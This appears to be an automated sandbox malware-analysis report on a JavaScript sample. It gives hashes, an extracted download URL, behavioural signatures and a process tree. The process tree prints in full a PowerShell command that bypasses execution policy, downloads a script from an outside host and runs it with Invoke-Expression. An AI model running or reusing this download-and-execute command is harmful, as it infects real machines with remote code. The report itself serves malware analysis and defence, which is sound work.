Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:47
Static task
static1
Behavioral task
behavioral1
Sample
d14540001eb6bb57cff3d52a7898963c34ba6dffdb64ff05f4a1a7358b786e58.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
d14540001eb6bb57cff3d52a7898963c34ba6dffdb64ff05f4a1a7358b786e58.js
Resource
win10v2004-20240226-en
General
-
Target
d14540001eb6bb57cff3d52a7898963c34ba6dffdb64ff05f4a1a7358b786e58.js
-
Size
71KB
-
MD5
ae23a12c8831e037b8709fad9294a3b6
-
SHA1
8253709b658abdb6a6519fba7e43ca5c5f475e36
-
SHA256
d14540001eb6bb57cff3d52a7898963c34ba6dffdb64ff05f4a1a7358b786e58
-
SHA512
176715387ba9e8ed0fd71fefb510cac2bac97a3882328e715de6c04f3213804d7f616e554c8f91207ebbdc734ba866cddb2c1790b7d1bcc9ffdd593c4475c6b0
-
SSDEEP
1536:dQ7ry9WhJ0vjA5ImvfctsfMrW0ObFftzs2Lq2+NhoYLl3nZX6wgPs:dQq9qJ0XmnZMs5lPq2IhoYLl3Zzws
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1796 powershell.exe 4 1796 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1796 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2868 wrote to memory of 1796 2868 wscript.exe 28 PID 2868 wrote to memory of 1796 2868 wscript.exe 28 PID 2868 wrote to memory of 1796 2868 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\d14540001eb6bb57cff3d52a7898963c34ba6dffdb64ff05f4a1a7358b786e58.js1⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-